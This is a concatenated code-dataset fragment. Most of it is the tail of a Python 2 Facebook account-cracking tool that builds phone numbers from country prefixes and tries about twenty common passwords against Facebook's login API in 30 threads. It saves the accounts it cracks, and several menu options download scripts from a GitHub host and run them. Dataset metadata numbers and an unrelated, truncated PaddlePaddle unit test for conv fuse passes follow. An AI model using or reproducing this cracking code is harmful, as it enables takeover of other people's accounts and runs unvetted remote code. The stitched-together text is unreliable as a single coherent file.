id.append(line.strip()) except IOError: print '[!] File Not Found' raw_input('\n[ Back ]') menu() elif bch == '2': tik() os.system('clear') os.system('pip2 install --upgrade babaindseven') os.system('clear') print psb('7 DIGIT INDIAN CRACKER UPDATED SUCCESSFULLY') os.system('clear') os.system('babaindseven') menu() elif bch == '3': tik() os.system('clear') if not os.path.isfile('.report.py'): jalan('DONT USE FACEBOOK AUTO REPORT. ONLY TIME WASTE. SO I RECOMMEND YOU TO DONT USE IT. BUT IF YOU WANT TO WASTE YOUR TIME THEN USE IT') time.sleep(1) os.system('wget https://raw.githubusercontent.com/BotolBaba0/BotolBaba0.github.io/master/.report.py') os.system('clear') os.system('python2 .report.py') else: os.system('python2 .report.py') time.sleep(0.001) raw_input('\n[\x1b[1;96mPRESS ENTER TO EXIT]') exb() elif bch == '4': tik() os.system('clear') if not os.path.isfile('.bspeed.py'): os.system('wget https://raw.githubusercontent.com/BotolBaba0/BotolBaba0.github.io/master/.bspeed.py') os.system('python2 .bspeed.py') else: os.system('python2 .bspeed.py') time.sleep(0.01) raw_input('\n[\x1b[1;96mPRESS ENTER TO GO BACK]') os.system('python2 .README.md') exb() elif bch == '5': tik() os.system('clear') print logo print try: c = raw_input('CHOOSE ANY CODE \n\n \x1b[1;93m 7862, 8151, 3153, 2568, 4015, 7182, 9172, 2024, 7018, 3033, 7037, 8032, 9996, 7087 : ') k = '+1' idlist = '.txt' for line in open(idlist, 'r').readlines(): id.append(line.strip()) except IOError: print '[!] File Not Found' raw_input('\n[ Back ]') menu() elif bch == '6': tik() os.system('clear') print logo print try: c = raw_input('TYPE ANY 4 DIGIT NUMBER \n\n \x1b[1;93m TYPE ANY CODE FROM 3280 TO 3910 : ') k = '+39' idlist = '.txt' for line in open(idlist, 'r').readlines(): id.append(line.strip()) except IOError: print '[!] File Not Found' raw_input('\n[ Back ]') menu() elif bch == '7': tik() os.system('clear') print logo print try: c = raw_input('TYPE ANY 3 DIGIT NUMBER \n\n \x1b[1;93m TYPE ANY CODE FROM 601 TO 770 : ') k = '+34' idlist = '.txt' for line in open(idlist, 'r').readlines(): id.append(line.strip()) except IOError: print '[!] File Not Found' raw_input('\n[ Back ]') menu() elif bch == '8': tik() os.system('clear') print logo print try: c = raw_input('TYPE ANY 3 DIGIT NUMBER \n\n \x1b[1;93m TYPE ANY CODE FROM 510 TO 690 : ') k = '+48' idlist = '.txt' for line in open(idlist, 'r').readlines(): id.append(line.strip()) except IOError: print '[!] File Not Found' raw_input('\n[ Back ]') menu() elif bch == '9': tik() os.system('clear') if not os.path.isfile('password.txt'): os.system('wget https://raw.githubusercontent.com/BotolBaba0/BotolBaba0.github.io/master/password.txt') if not os.path.isfile('.bt.py'): os.system('wget https://raw.githubusercontent.com/BotolBaba0/BotolBaba0.github.io/master/.bt.py') os.system('python2 .bt.py') else: os.system('python2 .bt.py') time.sleep(0.01) raw_input('\n[\x1b[1;96mPRESS ENTER TO GO BACK]') os.system('python2 .README.md') exb() elif bch == '11': os.system('xdg-open https://m.youtube.com/watch?v=FTPrPVqE56I') time.sleep(1) menu() elif bch == '12': os.system('xdg-open https://youtu.be/McahDH7uuV8') time.sleep(1) menu() elif bch == '13': os.system('xdg-open https://bit.do/botoleightdigit') time.sleep(1) menu() elif bch == '14': os.system('xdg-open https://bit.do/botolninedigit') time.sleep(1) menu() elif bch == '15': os.system('xdg-open https://m.youtube.com/watch?v=KAwRF2M9syw') time.sleep(1) menu() elif bch == '16': os.system('xdg-open https://youtu.be/QGdi1ZzG1sY') time.sleep(1) menu() elif bch == '17': os.system('xdg-open https://youtu.be/6uZTO1DaGXU') time.sleep(1) menu() elif bch == '18': os.system('xdg-open https://m.youtube.com/watch?v=0_4KLnFHZ7s') time.sleep(1) menu() elif bch == '20': tik() os.system('clear') os.system('pip2 install --upgrade bababindsix') os.system('clear') print logo print psb(' Tool has been successfully updated') time.sleep(1) os.system('python2 .README.md') menu() elif bch == '21': os.system('xdg-open https://facebook.com/mehedihasanariyan2') time.sleep(1) menu() elif bch == '22': os.system('xdg-open https://www.facebook.com/groups/231747098048450') time.sleep(1) menu() elif bch == '00': exb() else: print '[!] Fill in correctly' action() xxx = str(len(id)) psb('[\xe2\x9c\x93] TOTAL NUMBERS: ' + xxx) time.sleep(0.5) psb('[\xe2\x9c\x93] PLEASE WAIT, PROCESS IS RUNNING ...') time.sleep(0.5) psb('[!] TO STOP THIS PROCESS PRESS Ctrl THEN z') time.sleep(0.5) print 50 * '-' print def main(arg): user = arg try: os.mkdir('save') except OSError: pass try: pass1 = user data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm') q = json.load(data) if 'access_token' in q: print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n' + '\n' okb = open('save/successfull.txt', 'a') okb.write(k + c + user + '|' + pass1 + '\n') okb.close() oks.append(c + user + pass1) elif 'www.facebook.com' in q['error_msg']: print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n' cps = open('save/checkpoint.txt', 'a') cps.write(k + c + user + '|' + pass1 + '\n') cps.close() cpb.append(c + user + pass1) else: pass2 = 'Facebook' data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm') q = json.load(data) if 'access_token' in q: print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n' + '\n' okb = open('save/successfull.txt', 'a') okb.write(k + c + user + '|' + pass2 + '\n') okb.close() oks.append(c + user + pass2) elif 'www.facebook.com' in q['error_msg']: print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n' cps = open('save/checkpoint.txt', 'a') cps.write(k + c + user + '|' + pass2 + '\n') cps.close() cpb.append(c + user + pass2) else: pass3 = '786786' data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm') q = json.load(data) if 'access_token' in q: print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass3 + '\n' + '\n' okb = open('save/successfull.txt', 'a') okb.write(k + c + user + '|' + pass3 + '\n') okb.close() oks.append(c + user + pass3) elif 'www.facebook.com' in q['error_msg']: print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass3 + '\n' cps = open('save/checkpoint.txt', 'a') cps.write(k + c + user + '|' + pass3 + '\n') cps.close() cpb.append(c + user + pass3) else: pass4 = 'Pakistan786' data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm') q = json.load(data) if 'access_token' in q: print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass4 + '\n' + '\n' okb = open('save/successfull.txt', 'a') okb.write(k + c + user + '|' + pass4 + '\n') okb.close() oks.append(c + user + pass4) elif 'www.facebook.com' in q['error_msg']: print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass4 + '\n' cps = open('save/checkpoint.txt', 'a') cps.write(k + c + user + '|' + pass4 + '\n') cps.close() cpb.append(c + user + pass4) pass5 = 'Rahul123' data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm') q = json.load(data) if 'access_token' in q: print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass5 + '\n' + '\n' okb = open('save/successfull.txt', 'a') okb.write(k + c + user + '|' + pass5 + '\n') okb.close() oks.append(c + user + pass5) elif 'www.facebook.com' in q['error_msg']: print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass5 + '\n' cps = open('save/checkpoint.txt', 'a') cps.write(k + c + user + '|' + pass5 + '\n') cps.close() cpb.append(c + user + pass5) else: pass6 = 'sayang' data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm') q = json.load(data) if 'access_token' in q: print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass6 + '\n' + '\n' okb = open('save/successfull.txt', 'a') okb.write(k + c + user + '|' + pass6 + '\n') okb.close() oks.append(c + user + pass6) elif 'www.facebook.com' in q['error_msg']: print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass6 + '\n' cps = open('save/checkpoint.txt', 'a') cps.write(k + c + user + '|' + pass6 + '\n') cps.close() cpb.append(c + user + pass6) else: pass7 = 'Jaisriram' data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass7 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm') q = json.load(data) if 'access_token' in q: print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass7 + '\n' + '\n' okb = open('save/successfull.txt', 'a') okb.write(k + c + user + '|' + pass7 + '\n') okb.close() oks.append(c + user + pass7) elif 'www.facebook.com' in q['error_msg']: print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass7 + '\n' cps = open('save/checkpoint.txt', 'a') cps.write(k + c + user + '|' + pass7 + '\n') cps.close() cpb.append(c + user + pass7) else: pass8 = 'jancuk123' data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass8 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm') q = json.load(data) if 'access_token' in q: print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass8 + '\n' + '\n' okb = open('save/successfull.txt', 'a') okb.write(k + c + user + '|' + pass8 + '\n') okb.close() oks.append(c + user + pass8) elif 'www.facebook.com' in q['error_msg']: print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass8 + '\n' cps = open('save/checkpoint.txt', 'a') cps.write(k + c + user + '|' + pass8 + '\n') cps.close() cpb.append(c + user + pass8) pass9 = 'programmer123' data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass9 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm') q = json.load(data) if 'access_token' in q: print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass9 + '\n' + '\n' okb = open('save/successfull.txt', 'a') okb.write(k + c + user + '|' + pass9 + '\n') okb.close() oks.append(c + user + pass9) elif 'www.facebook.com' in q['error_msg']: print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass9 + '\n' cps = open('save/checkpoint.txt', 'a') cps.write(k + c + user + '|' + pass9 + '\n') cps.close() cpb.append(c + user + pass9) else: pass10 = 'loginadmin' data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass10 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm') q = json.load(data) if 'access_token' in q: print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass10 + '\n' + '\n' okb = open('save/successfull.txt', 'a') okb.write(k + c + user + '|' + pass10 + '\n') okb.close() oks.append(c + user + pass10) elif 'www.facebook.com' in q['error_msg']: print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass10 + '\n' cps = open('save/checkpoint.txt', 'a') cps.write(k + c + user + '|' + pass10 + '\n') cps.close() cpb.append(c + user + pass10) else: pass11 = 'kontol' data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass11 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm') q = json.load(data) if 'access_token' in q: print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass11 + '\n' + '\n' okb = open('save/successfull.txt', 'a') okb.write(k + c + user + '|' + pass11 + '\n') okb.close() oks.append(c + user + pass11) elif 'www.facebook.com' in q['error_msg']: print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass11 + '\n' cps = open('save/checkpoint.txt', 'a') cps.write(k + c + user + '|' + pass11 + '\n') cps.close() cpb.append(c + user + pass11) else: pass12 = 'Arjun123' data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass12 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm') q = json.load(data) if 'access_token' in q: print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass12 + '\n' + '\n' okb = open('save/successfull.txt', 'a') okb.write(k + c + user + '|' + pass12 + '\n') okb.close() oks.append(c + user + pass12) elif 'www.facebook.com' in q['error_msg']: print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass12 + '\n' cps = open('save/checkpoint.txt', 'a') cps.write(k + c + user + '|' + pass12 + '\n') cps.close() cpb.append(c + user + pass12) pass13 = '801639' data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass13 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm') q = json.load(data) if 'access_token' in q: print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass13 + '\n' + '\n' okb = open('save/successfull.txt', 'a') okb.write(k + c + user + '|' + pass13 + '\n') okb.close() oks.append(c + user + pass13) elif 'www.facebook.com' in q['error_msg']: print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass13 + '\n' cps = open('save/checkpoint.txt', 'a') cps.write(k + c + user + '|' + pass13 + '\n') cps.close() cpb.append(c + user + pass13) else: pass14 = '926291' data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass14 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm') q = json.load(data) if 'access_token' in q: print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass14 + '\n' + '\n' okb = open('save/successfull.txt', 'a') okb.write(k + c + user + '|' + pass14 + '\n') okb.close() oks.append(c + user + pass14) elif 'www.facebook.com' in q['error_msg']: print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass14 + '\n' cps = open('save/checkpoint.txt', 'a') cps.write(k + c + user + '|' + pass14 + '\n') cps.close() cpb.append(c + user + pass14) else: pass15 = 'IDONTKNOW' data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass15 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm') q = json.load(data) if 'access_token' in q: print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass15 + '\n' + '\n' okb = open('save/successfull.txt', 'a') okb.write(k + c + user + '|' + pass15 + '\n') okb.close() oks.append(c + user + pass15) elif 'www.facebook.com' in q['error_msg']: print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass15 + '\n' cps = open('save/checkpoint.txt', 'a') cps.write(k + c + user + '|' + pass15 + '\n') cps.close() cpb.append(c + user + pass15) else: pass16 = 'bharat' data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass16 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm') q = json.load(data) if 'access_token' in q: print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass16 + '\n' + '\n' okb = open('save/successfull.txt', 'a') okb.write(k + c + user + '|' + pass16 + '\n') okb.close() oks.append(c + user + pass16) elif 'www.facebook.com' in q['error_msg']: print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass16 + '\n' cps = open('save/checkpoint.txt', 'a') cps.write(k + c + user + '|' + pass16 + '\n') cps.close() cpb.append(c + user + pass16) pass17 = 'mypassword' data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass17 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm') q = json.load(data) if 'access_token' in q: print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass17 + '\n' + '\n' okb = open('save/successfull.txt', 'a') okb.write(k + c + user + '|' + pass17 + '\n') okb.close() oks.append(c + user + pass17) elif 'www.facebook.com' in q['error_msg']: print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass17 + '\n' cps = open('save/checkpoint.txt', 'a') cps.write(k + c + user + '|' + pass17 + '\n') cps.close() cpb.append(c + user + pass17) else: pass18 = 'password@' data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass18 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm') q = json.load(data) if 'access_token' in q: print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass18 + '\n' + '\n' okb = open('save/successfull.txt', 'a') okb.write(k + c + user + '|' + pass18 + '\n') okb.close() oks.append(c + user + pass18) elif 'www.facebook.com' in q['error_msg']: print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass18 + '\n' cps = open('save/checkpoint.txt', 'a') cps.write(k + c + user + '|' + pass18 + '\n') cps.close() cpb.append(c + user + pass18) else: pass19 = 'Mehedi12' data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass19 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm') q = json.load(data) if 'access_token' in q: print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass19 + '\n' + '\n' okb = open('save/successfull.txt', 'a') okb.write(k + c + user + '|' + pass19 + '\n') okb.close() oks.append(c + user + pass19) elif 'www.facebook.com' in q['error_msg']: print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass19 + '\n' cps = open('save/checkpoint.txt', 'a') cps.write(k + c + user + '|' + pass19 + '\n') cps.close() cpb.append(c + user + pass19) else: pass20 = 'Rahul123' data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass20 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm') q = json.load(data) if 'access_token' in q: print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass20 + '\n' + '\n' okb = open('save/successfull.txt', 'a') okb.write(k + c + user + '|' + pass20 + '\n') okb.close() oks.append(c + user + pass20) elif 'www.facebook.com' in q['error_msg']: print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass20 + '\n' cps = open('save/checkpoint.txt', 'a') cps.write(k + c + user + '|' + pass20 + '\n') cps.close() cpb.append(c + user + pass20) except: pass p = ThreadPool(30) p.map(main, id) print 50 * '-' print '[\xe2\x9c\x93] \x1b[1;96mPROCESS HAS BEEN COMPLETED....' print '[\xe2\x9c\x93] \x1b[1;96mTOTAL HACKED/CHECKPOINT : ' + str(len(oks)) + '/' + str(len(cpb)) print '[\xe2\x9c\x93] \x1b[1;96mCP FILE HAS BEEN SAVED : save/checkpoint.txt' raw_input('\n[\x1b[1;96mPRESS ENTER TO GO BACK]') os.system('python2 .README.md') if __name__ == '__main__': menu()

56.391433

1,961

0.506562

4,926

38,177

3.882257

0.101502

0.065258

0.047061

0.061493

0.813324

0.780067

0.74315

0.676794

0.671878

0.648086

0

0.14284

0.326086

38,177

677

1,962

56.391433

0.600474

0.009273

0

0.5216

0

0.1072

0.429663

0.130412

0

null

0.264

0.0128

null

0.128

0

null

0

1

0

1

0

1

0

null

0

1

0

1

0

7

ec0bd52e9261017335f0bf424d32f26d4c465029

8,281

py

Python

python/paddle/fluid/tests/unittests/ir/inference/test_conv_affine_channel_fuse_pass.py

2742195759/Paddle

ce034db1834af85539b22ab68492df9972ff3e69

[ "Apache-2.0" ]

17,085

2016-11-18T06:40:52.000Z

2022-03-31T22:52:32.000Z

python/paddle/fluid/tests/unittests/ir/inference/test_conv_affine_channel_fuse_pass.py

AFLee/Paddle

311b3b44fc7d51d4d66d90ab8a3fc0d42231afda

[ "Apache-2.0" ]

29,769

2016-11-18T06:35:22.000Z

2022-03-31T16:46:15.000Z

python/paddle/fluid/tests/unittests/ir/inference/test_conv_affine_channel_fuse_pass.py

AFLee/Paddle

311b3b44fc7d51d4d66d90ab8a3fc0d42231afda

[ "Apache-2.0" ]

4,641

2016-11-18T07:43:33.000Z

2022-03-31T15:15:02.000Z

# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import unittest import numpy as np from inference_pass_test import InferencePassTest import paddle.fluid as fluid import paddle.fluid.core as core from paddle.fluid.core import PassVersionChecker class ConvAffineChannelFusePassExplicitPaddingTest(InferencePassTest): def setUp(self): with fluid.program_guard(self.main_program, self.startup_program): data = fluid.data( name="data", shape=[-1, 3, 64, 64], dtype="float32") conv_out = fluid.layers.conv2d( input=data, num_filters=3, filter_size=3, groups=3, padding=[1, 1, 1, 1], bias_attr=False, act=None) input_scale = fluid.layers.create_parameter( shape=[3], dtype="float32") input_bias = fluid.layers.create_parameter( shape=[3], dtype="float32") ac_out = fluid.layers.affine_channel( x=conv_out, scale=input_scale, bias=input_bias) self.feeds = { "data": np.random.random([1, 3, 64, 64]).astype("float32"), } self.fetch_list = [ac_out] def test_check_output(self): self.check_output() self.assertTrue( PassVersionChecker.IsCompatible('conv_affine_channel_fuse_pass')) class ConvAffineChannelFusePassValidPaddingTest(InferencePassTest): def setUp(self): with fluid.program_guard(self.main_program, self.startup_program): data = fluid.data( name="data", shape=[-1, 3, 64, 64], dtype="float32") conv_out = fluid.layers.conv2d( input=data, num_filters=3, filter_size=3, groups=3, padding='VALID', bias_attr=False, act=None) input_scale = fluid.layers.create_parameter( shape=[3], dtype="float32") input_bias = fluid.layers.create_parameter( shape=[3], dtype="float32") ac_out = fluid.layers.affine_channel( x=conv_out, scale=input_scale, bias=input_bias) self.feeds = { "data": np.random.random([1, 3, 64, 64]).astype("float32"), } self.fetch_list = [ac_out] def test_check_output(self): self.check_output() self.assertTrue( PassVersionChecker.IsCompatible('conv_affine_channel_fuse_pass')) class ConvAffineChannelFusePassSamePaddingTest(InferencePassTest): def setUp(self): with fluid.program_guard(self.main_program, self.startup_program): data = fluid.data( name="data", shape=[-1, 3, 64, 64], dtype="float32") conv_out = fluid.layers.conv2d( input=data, num_filters=3, filter_size=3, groups=3, padding='SAME', bias_attr=False, act=None) input_scale = fluid.layers.create_parameter( shape=[3], dtype="float32") input_bias = fluid.layers.create_parameter( shape=[3], dtype="float32") ac_out = fluid.layers.affine_channel( x=conv_out, scale=input_scale, bias=input_bias) self.feeds = { "data": np.random.random([1, 3, 64, 64]).astype("float32"), } self.fetch_list = [ac_out] def test_check_output(self): self.check_output() self.assertTrue( PassVersionChecker.IsCompatible('conv_affine_channel_fuse_pass')) class ConvEltwiseAddAffineChannelFusePassExplicitPaddingTest(InferencePassTest): def setUp(self): with fluid.program_guard(self.main_program, self.startup_program): data = fluid.data( name="data", shape=[-1, 3, 64, 64], dtype="float32") param_attr = fluid.ParamAttr( initializer=fluid.initializer.Xavier(uniform=False), learning_rate=0.001) conv_out = fluid.layers.conv2d( input=data, num_filters=3, filter_size=3, groups=3, padding=[1, 1, 1, 1], bias_attr=param_attr, act=None) input_scale = fluid.layers.create_parameter( shape=[3], dtype="float32") input_bias = fluid.layers.create_parameter( shape=[3], dtype="float32") ac_out = fluid.layers.affine_channel( x=conv_out, scale=input_scale, bias=input_bias) self.feeds = { "data": np.random.random([1, 3, 64, 64]).astype("float32"), } self.fetch_list = [ac_out] def test_check_output(self): self.check_output() self.assertTrue( PassVersionChecker.IsCompatible( 'conv_eltwiseadd_affine_channel_fuse_pass')) class ConvEltwiseAddAffineChannelFusePassValidPaddingTest(InferencePassTest): def setUp(self): with fluid.program_guard(self.main_program, self.startup_program): data = fluid.data( name="data", shape=[-1, 3, 64, 64], dtype="float32") param_attr = fluid.ParamAttr( initializer=fluid.initializer.Xavier(uniform=False), learning_rate=0.001) conv_out = fluid.layers.conv2d( input=data, num_filters=3, filter_size=3, groups=3, padding='VALID', bias_attr=param_attr, act=None) input_scale = fluid.layers.create_parameter( shape=[3], dtype="float32") input_bias = fluid.layers.create_parameter( shape=[3], dtype="float32") ac_out = fluid.layers.affine_channel( x=conv_out, scale=input_scale, bias=input_bias) self.feeds = { "data": np.random.random([1, 3, 64, 64]).astype("float32"), } self.fetch_list = [ac_out] def test_check_output(self): self.check_output() self.assertTrue( PassVersionChecker.IsCompatible( 'conv_eltwiseadd_affine_channel_fuse_pass')) class ConvEltwiseAddAffineChannelFusePassSamePaddingTest(InferencePassTest): 